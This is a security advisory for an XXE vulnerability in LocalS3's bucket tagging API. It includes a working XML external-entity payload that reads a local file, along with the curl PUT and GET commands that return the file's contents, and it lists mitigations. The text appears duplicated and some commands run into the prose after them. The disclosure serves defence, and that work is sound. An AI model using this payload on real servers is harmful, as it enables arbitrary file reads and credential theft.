Headline
GHSA-v232-254c-m6p7: LocalS3 Project Vulnerable to XML External Entity (XXE) Injection via Bucket Tagging API
Description
The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.
When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server’s filesystem by defining an external entity that references local files.
The vulnerability is particularly severe because it allows direct access to sensitive files on the server’s filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.
Steps to Reproduce
Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)
Send a PUT request to the bucket tagging endpoint with the following XML payload:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///flag.txt" > ]> <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>curl -X PUT \ -H "Host: app" \ -H "Authorization: AWS dummy:dummy" \ -H "Content-Type: application/xml" \ --data-binary @xxe.xml \ http://app/bucket?taggingRetrieve the bucket tags using a GET request to the same endpoint
curl -H "Authorization: AWS dummy:dummy" http://app-1/bucket?taggingThe content of the targeted file will be returned in the tag value
The successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server’s filesystem.
Mitigations
- Disable XML external entity resolution in the XML parser configuration
- Implement proper XML parsing security controls such as disabling DTD processing altogether
- Use a safe parser configuration that doesn’t process external entities or DTDs by default
- Validate and sanitize all XML input before processing to prevent injection of malicious entities
Impact
Critical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server’s filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.
Description
The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.
When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server’s filesystem by defining an external entity that references local files.
The vulnerability is particularly severe because it allows direct access to sensitive files on the server’s filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.
Steps to Reproduce
Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)
Send a PUT request to the bucket tagging endpoint with the following XML payload:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY xxe SYSTEM “file:///flag.txt” > ]> <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>
curl -X PUT \ -H "Host: app" \ -H "Authorization: AWS dummy:dummy" \ -H "Content-Type: application/xml" \ --data-binary @xxe.xml \ http://app/bucket?taggingRetrieve the bucket tags using a GET request to the same endpoint
curl -H "Authorization: AWS dummy:dummy" http://app-1/bucket?taggingThe content of the targeted file will be returned in the tag value
The successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server’s filesystem.
Mitigations
- Disable XML external entity resolution in the XML parser configuration
- Implement proper XML parsing security controls such as disabling DTD processing altogether
- Use a safe parser configuration that doesn’t process external entities or DTDs by default
- Validate and sanitize all XML input before processing to prevent injection of malicious entities
Impact
Critical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server’s filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.
References
- GHSA-v232-254c-m6p7
- Robothy/local-s3@d6ed756